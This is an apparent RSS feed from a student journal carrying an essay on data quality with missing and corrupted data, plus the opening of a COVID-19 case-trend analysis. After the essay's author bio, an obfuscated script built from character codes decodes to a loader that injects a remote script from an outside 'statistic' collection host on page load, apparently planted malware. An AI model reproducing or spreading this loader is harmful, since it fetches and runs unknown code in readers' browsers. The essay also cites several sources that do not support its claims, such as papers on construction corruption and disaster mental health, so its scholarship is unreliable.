<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>data trends Archives - Exploratio Journal</title>
	<atom:link href="https://exploratiojournal.com/tag/data-trends/feed/" rel="self" type="application/rss+xml" />
	<link>https://exploratiojournal.com/tag/data-trends/</link>
	<description>Student-edited Academic Publication</description>
	<lastBuildDate>Sun, 22 Aug 2021 14:53:29 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://exploratiojournal.com/wp-content/uploads/2020/07/cropped-Exploratio_icon-1-32x32.png</url>
	<title>data trends Archives - Exploratio Journal</title>
	<link>https://exploratiojournal.com/tag/data-trends/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Data Quality Analysis Relating to Missing and Corrupted Data</title>
		<link>https://exploratiojournal.com/data-quality-analysis-relating-to-missing-and-corrupted-data/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=data-quality-analysis-relating-to-missing-and-corrupted-data</link>
		
		<dc:creator><![CDATA[Varshini Siddavatam]]></dc:creator>
		<pubDate>Sun, 22 Aug 2021 14:52:10 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[computer science]]></category>
		<category><![CDATA[data science]]></category>
		<category><![CDATA[data trends]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1008</guid>

					<description><![CDATA[<p>Varshini Siddavatam<br />
Sri Chaitanya Junior College</p>
<div class="date">
August 1, 2021
</div>
<p>The post <a href="https://exploratiojournal.com/data-quality-analysis-relating-to-missing-and-corrupted-data/">Data Quality Analysis Relating to Missing and Corrupted Data</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none wp-block-paragraph"><strong>Author: Varshini Siddavatam<br></strong><em>Sri Chaitanya Junior College</em><br>August 1, 2021</p>
</div></div>



<h2 class="wp-block-heading">&nbsp;Abstract</h2>



<p class="wp-block-paragraph">It is the purpose of this paper to investigate the impact of missing values on commonly encountered data analysis problems. The ability to more effectively identify patterns in socio-demographic longitudinal data is critical in a wide range of social science settings, including academia. Because of the categorical and multidimensional nature of the data, as well as the contamination caused by missing and inconsistent values, it is difficult to perform fundamental analytical operations such as clustering, which groups data based on similarity patterns. Companies can suffer significant financial losses as a result of inaccurate data. Poor-quality data is frequently cited as the root cause of operational snafus, inaccurate analytics, and poorly thought-out business strategies, among other things. Examples of the economic harm that data quality problems can cause include increased costs when products are shipped to the wrong customer addresses, lost sales opportunities as a result of inaccurate or incomplete customer records, and fines for failing to comply with financial or regulatory reporting requirements. Processes such as data cleansing, also known as data scrubbing, are used to correct data errors, as well as work to enhance data sets by including missing values, more up-to-date information, or additional records, among other things. Afterwards, the results are monitored and measured in relation to the performance objectives, and any remaining deficiencies in data quality serve as a starting point for the next round of planned improvements. It is the goal of such a cycle to ensure that efforts to improve overall data quality continue after individual projects are finished.</p>



<h2 class="wp-block-heading">I. Introduction</h2>



<h4 class="wp-block-heading">A. Background Information</h4>



<p class="wp-block-paragraph">Data quality is a process of measuring the context of data depending on several factors such as consistency, accuracy, reliability, completeness and whether it is contemporary. The professionals have to deal with several missing and corrupted data in their regular work. In order to make data more concrete and flexible, it is highly significant to identify the data quality and data errors. Missing data is similar to the missing values of any important document or information of a whole unit. In case of missing informative data, no information will be provided to the required criteria.&nbsp;</p>



<p class="wp-block-paragraph">Especially in this recent decade, within constant increasing online data storage the issue regarding corrupt data is rapidly growing. People nowadays provide their maximum personal information in social networking sites or online sites and the majority of the working procedures are happening depending on the online networks. Based on the daily information of the missing data, the reported rate is 15% to 20% (nih.gov, 2021). Accompanied with this approach it is highly significant to maintain the quality of data.&nbsp;</p>



<h4 class="wp-block-heading">B. Thesis Statement</h4>



<p class="wp-block-paragraph">In this study researchers have focused on the importance of analyzing quality of data in relation to missing and corrupted data. The thesis statement of the research is that missing and corrupted data can be maintained through effective solutions that can improve the quality of overall data. Along with this, improving storage capacity of the data collection process can protect all the valuable data from being corrupted or missing.&nbsp;</p>



<p class="wp-block-paragraph">Accompanied with better knowledge and skills the operating process of data protection can be utilized in a far better way to secure all the important documents that are uploaded in the various online sites. Maintaining good quality data that will not be easy to imitate or steal also will be identified as a preventer of corrupting data. It also can be stated after analysing the study regarding missing data that overall the world currently the cases of missing data has increased a lot. If the prevention process gets proper governmental support in this criterion, this process will be better understood by everyone. </p>



<h2 class="wp-block-heading">II. Body</h2>



<h4 class="wp-block-heading">A. Support Paragraph 1</h4>



<p class="wp-block-paragraph">Due to being unable to handle missing and corrupted data can have a negative effect over an individual work process. </p>



<p class="wp-block-paragraph">In order to handle missing and corrupted data the operators can calculate the cluster value in the column and put the obtained number to the empty spot. As opined by Hao <em>et al.</em> (2018), following the sudden outage of power can save the data from being corrupted. Several times system crashes are considered as another issue of inability to protect data. As stated by Gudivada <em>et al.</em> (2017), in case a PC hard disk gets filled with junk files, the data corruption process gets enhanced. Restoring previous versions in the main storage can help in saving data corruption. In addition, updating the computer process system on a daily basis can help operators to handle their important data. As observed by Azeroual &amp; Schöpfel (2019), the DISM tool is an effective strategy to modify and repair system images by administrators and developers under the category of computer science. Due to recovering corrupted files, the hard disk command is recognized as another key factor that is able to repair missing data. </p>



<p class="wp-block-paragraph">According to the reports, the frauds based on internet stock have earned millions of amounts per year. Among the total amount of missing data, the maximum quantity is not able to be repaired. As stated by Owusu <em>et al.</em> (2019), the factor of missing data is concerning for the aged people who have a very tiny knowledge regarding the technologies and online procedures. Since nowadays the maximum work process is done through online networking sites, it is really a risk factor to secure the valuable data from the eyes of hackers. The aged people become easily manipulated by the cyber frauds phishing calls and share their personal details. Accompanied with advanced and modern technology several hackers continue to hack others important data easily. If any valuable data is hacked or missed or corrupted, it can be utilized to lead any kind of criminal activities.&nbsp;</p>



<p class="wp-block-paragraph">In order to secure various types of activities there required a proper approach to protect data properly. Missing or corrupting data not only affect the work procedure in an individual organization but also harm any individual by personal information. As proposed by Morganstein &amp; Ursano (2020), due to working while staying far from the sectors it creates difficulties for the employees under the data security provider system. It is also identified as a major issue regarding corrupted data. In many cases it also can be found that not having proper knowledge and skills, employees remain not capable to protecting data from bemg missing. Data always remains important and significant to prove anything at an initial stage. The principle of “missing data methods” does not place a missing value slightly as they merge available information from the monitoring data with idiomatic supposition.&nbsp;</p>



<p class="wp-block-paragraph">In case of missing any vital data or information also affects the research process and creates obstacles for the researchers. Especially in the corporate or private working sectors the entire work procedures are happening through internet based networking sites, the majority of data missing cases are found here. As per the view of Pan &amp; Chen (2018), operating online sites are delivering new advantages for the cyber frauds along with hackers to implement offense. All the staff in a corporate sector is not capable of handling data secure processes, so in case of missing data they face a lot of issues in their work system. This affects negatively to lead the work process smoothly and perfectly and consequently it can increase the trust issue. </p>



<p class="wp-block-paragraph">Adopting several strategic plans the administrators and developers under the category of computer science can recover missing and corrupted data. Apart from this, adopting proper knowledge and skill regarding data protection activity also can help to reduce the effect of missing data. Corrupted data not only affect the work process in the corporate world but also harm the customer trust factors. As nowadays the maximum work process is done through online networking sites, it is really a risk factor to secure the valuable data from the eyes of hackers. In this recent era, not having proper knowledge regarding data security there leads to a serious issue especially in the working system.&nbsp;</p>



<h4 class="wp-block-heading">B. Support Paragraph 2</h4>



<p class="wp-block-paragraph">Being able to manage data quality analysis can recover missing and corrupted data that have a positive effect over an individual work process. </p>



<p class="wp-block-paragraph">As poor-quality data often make limitations in the work process, it is important to adopt data quality analysis to have the ability to save work performance. As stated by Wahyudi <em>et al.</em> (2018), to make a more active operating system the quality of data can be maintained by the developers. As per the view of Uthayakumar <em>et al. </em>(2018), top quality databases can bring migration consideration for an individual work process. In this segment, estimating and implementing a data recovery warehouse is able to meet the need of work culture. As opined by Cappiello <em>et al.</em> (2018), within awareness regarding quality management helps in making an effective work process. Maintaining the use of good quality data helps to improve the decision-making process to make the work more authentic.&nbsp;</p>



<p class="wp-block-paragraph">&nbsp;As in any work procedure data collection method and collected data both are equally important and have a vital role to precede the entire procedure. In order to protect the data there required a proper skill regarding handling the information and making them placed in a secure storage. As opined by Triguero <em>et al.</em> (2019), adoption of adequate data policy also can help in protecting valuable data for a long-term issue. While transforming big sized data, the majority areas cause corruption and missing data. Since big data is heavy to load and transfer with a minimum time, it requires a proper framework that can be helpful to support this approach. Along with this, focusing on the making process of data storage is also capable of securing informative data more protectively.&nbsp;</p>



<p class="wp-block-paragraph">This approach especially helps the employees who are working in any corporate organization. Holding data properly is a significant requirement in a workplace, as it is related to the success procedure of the organization. According to Benzeval <em>et al. </em>(2020), based on the data the work process has to be done in any organization and it is able to predict whether the profit can be possible or not. Missing data and corruption of data is a random process that happens when the system is filled and overloaded. In this scenario, having computer knowledge can prevent large size loss and make it a little easier to handle. Utilizing good quality databases has the capability to retain important data for a long time to be used. Therefore, constant experiments regarding data quality analysis can assist the entire process to be more active to protect data from being corrupted.&nbsp;</p>



<p class="wp-block-paragraph">The value of data can be held by adopting effective technologies that are capable of delivering extra security systems that could not be lost. Though, the factor of data analysis needs to be more efficient so that any kind of error can be noticed to prevent the risk issues. In the words of Broeders <em>et al.</em> (2017), focusing on the data quality has the ability to secure the information and reduce the risk factors. Accompanied with the recent pace, it is highly crucial to invent new strategies and technologies in the workplace to bring innovation while maintaining data quality. Understanding the requirement of data analysis also can help in managing a proper strategy to manage the corrupted data. </p>



<p class="wp-block-paragraph">A top-quality data can mitigate the lack of trust and provide reliable resources for finishing any work segment. Based on the data analysis the process of any individual work has to be done in any organization and it is able to predict whether the profit can be possible or not. While transforming big sized data, the majority areas cause corruption and missing data. Adopting advanced and modern security systems can handle the big size data and secure them from being corrupted. Due to fulfilling all the criteria discussed in the above section, it is highly required to follow a proper data analysis method so that the potential risk factors can be highlighted or marked to be fixed again. </p>



<h2 class="wp-block-heading">III. Conclusion</h2>



<p class="wp-block-paragraph">Identifying the data quality can ensure whether the work process will be beneficial or not. The entire structure of the data analysis method needs to be more active to recover missing and corrupted data. Maintaining proper rules and regulations also can help to control top data collection methods to avoid data errors. Accompanied with advanced and modern technology several hackers continue to hack others important data easily. Preventing them from all types of offences the organizations need to adopt a more effective and active data security system to retain for a longterm issue. In many cases, it can be seen that not having proper knowledge regarding data security there leads to a serious issue especially in the working system. Maintaining good quality data that will not be easy to imitate or steal also will be identified as a preventer of corrupting data. In addition, having computer knowledge can prevent large size loss and make it a little easier to handle. </p>



<p class="wp-block-paragraph">Depending on the entire study it can be concluded that monitoring improvement results is capable of managing data quality. High quality data is always considered as helpful in order to meet inaccurate data needs to work with good and valid information. Accompanied with better knowledge and skills the operating process of data protection can be utilized in a far better way to secure all the important documents that are uploaded in the various online sites. Due to leading the work process in any organization there is highly required a proper framework to analyze the collected data in order to identify the potential risks or errors to prevent it from very early stage.&nbsp;</p>



<h2 class="wp-block-heading">Reference List</h2>



<p class="wp-block-paragraph">Azeroual, O., &amp; Schöpfel, J. (2019). Quality issues of CRIS data: An exploratory investigation with universities from twelve countries. Publications, 7(1), 14. Retrieved From: https://www.mdpi.com/416282</p>



<p class="wp-block-paragraph">Benzeval, M., Bollinger, C., Burton, J., Couper, M. P., Crossley, T. F., &amp; Jäckle, A. (2020). Integrated data: research potential and data quality. Understanding Society Working Paper Series, (2020-02). Retrieved From: https://www.understandingsociety.ac.uk/sites/default/files/downloads/working-papers/2020-02.pdf</p>



<p class="wp-block-paragraph">Broeders, D., Schrijvers, E., van der Sloot, B., van Brakel, R., de Hoog, J., &amp; Ballin, E. H. (2017). Big Data and security policies: Towards a framework for regulating the phases of analytics and use of Big Data. Computer Law &amp; Security Review, 33(3), 309-323. Retrieved From: https://www.sciencedirect.com/science/article/pii/S0267364917300675</p>



<p class="wp-block-paragraph">Cappiello, C., Samá, W., &amp; Vitali, M. (2018, June). Quality awareness for a successful big data exploitation. In Proceedings of the 22nd International Database Engineering &amp; Applications Symposium (pp. 37-44). Retrieved From: https://dl.acm.org/doi/abs/10.1145/3216122.3216124</p>



<p class="wp-block-paragraph">Gudivada, V., Apon, A., &amp; Ding, J. (2017). Data quality considerations for big data and machine learning: Going beyond data cleaning and transformations. <em>International Journal on Advances in Software</em>, <em>10</em>(1), 1-20. Retrieved From: https://www.researchgate.net/profile/Junhua-Ding/publication/318432363_Data_Quality_Considerations_for_Big_Data_and_Machine_Learning _Going_Beyond_Data_Cleaning_and_Transformations/links/59ded28b0f7e9bcfab244bdf/Data-Quality-Considerations-for-Big-Data-and-Machine-Learning-Going-Beyond-Data-Cleaning-and-Transformations.pdf</p>



<p class="wp-block-paragraph">Hao, Y., Wang, M., Chow, J. H., Farantatos, E., &amp; Patel, M. (2018). Modelless data quality improvement of streaming synchrophasor measurements by exploiting the low-rank Hankel structure. <em>IEEE Transactions on Power Systems</em>, <em>33</em>(6), 6966-6977. Retrieved From: https://ieeexplore.ieee.org/abstract/document/8395403/</p>



<p class="wp-block-paragraph">Morganstein, J. C., &amp; Ursano, R. J. (2020). Ecological disasters and mental health: causes, consequences, and interventions. Frontiers in psychiatry, 11, 1. Retrieved From: https://www.frontiersin.org/articles/10.3389/fpsyt.2020.00001/full</p>



<p class="wp-block-paragraph">nih.gov, 2021. The prevention and handling of the missing data [Online]. Available at: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3668100/ [Accessed on 27 July, 2021]&nbsp;</p>



<p class="wp-block-paragraph">Owusu, E. K., Chan, A. P., &amp; Shan, M. (2019). Causal factors of corruption in construction project management: An overview. Science and engineering ethics, 25(1), 1-31. Retrieved From: https://link.springer.com/content/pdf/10.1007/s11948-017-0002-4.pdf</p>



<p class="wp-block-paragraph">Pan, J., &amp; Chen, K. (2018). Concealing corruption: How Chinese officials distort upward reporting of online grievances. American Political Science Review, 112(3), 602-620. Retrieved From: https://www.cambridge.org/core/journals/american-political-science-review/article/concealing-corruption-how-chinese-officials-distort-upward-reporting-of-online-grievances/43D20A0E5F63498BB730537B7012E47B</p>



<p class="wp-block-paragraph">Triguero, I., García‐Gil, D., Maillo, J., Luengo, J., García, S., &amp; Herrera, F. (2019). Transforming big data into smart data: An insight on the use of the k‐nearest neighbors algorithm to obtain quality data. Wiley Interdisciplinary Reviews: Data Mining and Knowledge Discovery, 9(2), e1289. Retrieved From: https://wires.onlinelibrary.wiley.com/doi/abs/10.1002/widm.1289</p>



<p class="wp-block-paragraph">Uthayakumar, J., Vengattaraman, T., &amp; Dhavachelvan, P. (2018). A survey on data compression techniques: From the perspective of data quality, coding schemes, data type and applications. Journal of King Saud University-Computer and Information Sciences. Retrieved From: https://www.sciencedirect.com/science/article/pii/S1319157818301101</p>



<p class="wp-block-paragraph">Wahyudi, A., Kuk, G., &amp; Janssen, M. (2018). A process pattern model for tackling and improving big data quality. Information Systems Frontiers, 20(3), 457-469. Retrieved From: https://link.springer.com/article/10.1007/s10796-017-9822-7</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Varshini Siddavatam</h5>
<p class="no_indent" style="margin:0;">Varshini is a senior at the Sri Chaitanya Junior College. Always interested in coding and data, she hopes to pursue computer science for her undergraduate major. Apart from academics, she is also interested in basketball, painting, dancing, and writing.</p></figure></div>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/data-quality-analysis-relating-to-missing-and-corrupted-data/">Data Quality Analysis Relating to Missing and Corrupted Data</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>What Does COVID-19 Tell Us?</title>
		<link>https://exploratiojournal.com/what-does-covid-19-tell-us/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=what-does-covid-19-tell-us</link>
		
		<dc:creator><![CDATA[Leison Gao]]></dc:creator>
		<pubDate>Wed, 17 Mar 2021 17:03:59 +0000</pubDate>
				<category><![CDATA[Mathematics]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[Statistics]]></category>
		<category><![CDATA[COVID-19]]></category>
		<category><![CDATA[data trends]]></category>
		<category><![CDATA[government response]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=827</guid>

					<description><![CDATA[<p>Leison Gao<br />
Los Gatos High School</p>
<div class="date">
February 6, 2021
</div>
<p>The post <a href="https://exploratiojournal.com/what-does-covid-19-tell-us/">What Does COVID-19 Tell Us?</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none wp-block-paragraph"><strong>Author: Leison Gao</strong><br><em>Los Gatos High School </em><br>February 6, 2021</p>
</div></div>



<hr class="wp-block-separator"/>



<h2 class="wp-block-heading">1 Introduction</h2>



<h4 class="wp-block-heading">1.1 Overview of COVID-19&nbsp;</h4>



<p class="wp-block-paragraph">COVID-19 was first found in Wuhan, China. COVID-19 was first thought to be pneumonia, but was later discovered to be a new strain of coronavirus. The disease was a respiratory virus that could be spread through droplets in the air. As a result many countries created guidelines to protect people from spreading the virus. One of the most impactful guidelines put into place were shelter in place orders. Businesses closed down and economies suffered greatly. At one point, oil had negative value due to lack of consumption.&nbsp;</p>



<p class="wp-block-paragraph">The virus spread from China to Europe and other countries such as the US. Mainly due to the high amount of travel between other countries and China. In February 2020, the first COVID-19 case was detected in the US. Some countries, like Vietnam handled the virus better than others by imposing strict quarantine and stay at home orders. On the contrary, some countries such as Italy suffered greatly due to lack of preparation and other factors. The world surpassed 1 million COVID-19 deaths in late September 2020 and the cases continue to climb into 2021.&nbsp;</p>



<p class="wp-block-paragraph">COVID-19 is a disease that has had an unprecedented effect on the world. The most similar pandemic happened over a century ago with the Spanish Flu. The disease has taken its toll on every single person with people losing their loved ones, others suffering financially, and many lifestyles changed to reduce the spread of the virus.&nbsp;</p>



<p class="wp-block-paragraph">Unfortunately COVID-19 continues to infect more people and there seems to be no peak for the cases yet. New mutations of the virus are being discovered which threaten more people and more lives. At the same time, governments are sponsoring vaccine development and leading healthcare experts are battling against the virus to develop and distribute a vaccine, and possibly a cure.&nbsp;</p>



<h4 class="wp-block-heading">1.2 Goals of the paper&nbsp;</h4>



<p class="wp-block-paragraph">In this research paper, data of cases over time for separate countries will be analyzed. The goal of the analysis is to discover similarities between countries and general trends of the spread of the disease. From these trends, people can then understand what caused the different rates of spread and how governments can take better action and build on the successes of other governments to mitigate the spread of future viruses.&nbsp;</p>



<h2 class="wp-block-heading">2 Methodology&nbsp;</h2>



<h4 class="wp-block-heading">2.1 Data&nbsp;</h4>



<p class="wp-block-paragraph">The data used in this study was taken online from data pulled from the John Hopkins University Center for Systems Science and Engineering. The dataset is about the 2019 Coronavirus pandemic, also known as COVID-19. The dataset contains data dating back to the beginning of the pandemic in late January 2020 and continues to be updated nearly daily at the time of this research paper’s publication, mid February 2021. Data from 191 countries is collected as well as some that include specific provinces within the countries. The data is grouped using date and country and has the total number of confirmed cases, deaths, and recoveries for each date.&nbsp;</p>



<p class="wp-block-paragraph">Changes to the data were needed in order to effectively work on the data and fully understand what the data presented. In order to accomplish this, several new datasets were created using the data collected. Firstly, the data was organized so that the number of confirmed cases, deaths, and recoveries could all be listed in one row, or observation. This presented data that had simple the cases that occurred on a certain date. This created the dataset ”dfdaily”. &nbsp;</p>



<figure class="wp-block-image size-large"><img fetchpriority="high" decoding="async" width="764" height="210" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image.png" alt="" class="wp-image-828" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image.png 764w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-300x82.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-230x63.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-350x96.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-480x132.png 480w" sizes="(max-width: 764px) 100vw, 764px" /></figure>



<p class="wp-block-paragraph">In addition, cumulative case counts were also needed to analyze the data. Contrary to the ”dfdaily” dataset, the ”dfcum” dataset has observations that represent the total case count that the country had on the specific date. &nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="431" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-1-1024x431.png" alt="" class="wp-image-829" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-1-1024x431.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-1-300x126.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-1-768x323.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-1-830x349.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-1-230x97.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-1-350x147.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-1-480x202.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-1.png 1464w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="142" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-2-1024x142.png" alt="" class="wp-image-830" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-2-1024x142.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-2-300x42.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-2-768x107.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-2-830x115.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-2-230x32.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-2-350x49.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-2-480x67.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-2.png 1438w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">Moreover, a dataset representing the total global cases by date is also helpful in the analysis. This dataset would require the countries to be dropped and would have the confirmed cases, deaths, and recoveries for the whole world by date, as well as the cumulative counts of each of them. This dataset would be named ”dfglobal”.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="387" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-3-1024x387.png" alt="" class="wp-image-831" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-3-1024x387.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-3-300x113.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-3-768x290.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-3-830x313.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-3-230x87.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-3-350x132.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-3-480x181.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-3.png 1298w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">Finally, a dataset that represented the total cases was created to understand what the countries’ confirmed cases, deaths, and recoveries were in total. This dataset, ”dfrate”, essentially is the observations in ”dfcum” that have the latest date value. Also, a death rate was calculated for each country based on the case count. &nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="926" height="452" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-4.png" alt="" class="wp-image-832" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-4.png 926w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-4-300x146.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-4-768x375.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-4-830x405.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-4-230x112.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-4-350x171.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-4-480x234.png 480w" sizes="(max-width: 926px) 100vw, 926px" /></figure>



<h2 class="wp-block-heading">3 Data Analysis&nbsp;</h2>



<h4 class="wp-block-heading">3.1 Global Analysis&nbsp;</h4>



<p class="wp-block-paragraph">To begin, take the data for all the countries collectively and see the world’s cumulative data. Some of these would be cumulative confirmed cases, deaths, recoveries over time. Instead we can also look at the cases from each day or the cumulative death rate for each day. &nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="825" src="https://www.exploratiojournal.com/wp-content/uploads/2021/03/image-5-1024x825.png" alt="" class="wp-image-833" srcset="https://exploratiojournal.com/wp-content/uploads/2021/03/image-5-1024x825.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-5-300x242.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-5-768x619.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-5-830x669.png 830w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-5-230x185.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-5-350x282.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-5-480x387.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/03/image-5.png 1062w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">The graph above shows the total cumulative cases over time. The red line represents the deaths, the orange line, active cases, the green line, recoveries, and the blue line, total confirmed cases.&nbsp;</p>



<p class="wp-block-paragraph">It appears that the confirmed cases, deaths, and recoveries all seem to grow relative to each other. There appears to be a small growth that gradually grows to become exponential in all the graphs. Around April 2020 seems to be when the cases begin to grow rapidly which is around 4-5 months after the discovery of the virus. In addition, the active cases first begin to be larger than the recoveries in the time period following April. However this seems expected since the average time of recovery from the virus is around 2-6 weeks depending on the severity of the case.&nbsp;</p>



<p class="wp-block-paragraph">Something that is concerning is that there still seems to be no peak of the curve. This is worrying because there always have been reminders about ”flattening the curve”, yet the peak has not arrived yet. The data shows that the cases will continue to grow, possibly even more exponentially into the future, with no real sign of it flattening out and beginning to decline going into 2021.&nbsp;</p>



<p class="wp-block-paragraph">The virus was predicted to get better during the summer months in the US, however the data seems to contradict that statement. Around July, the confirmed cases seem to take a bend upwards and grow more rapidly than before. The cause might be due to people wanting to enjoy a summer vacation despite the conditions of the virus.&nbsp;</p>



<p class="wp-block-paragraph">Next, looking at the global death rate alongside global deaths over time might reveal some more information about the virus. &nbsp;</p>



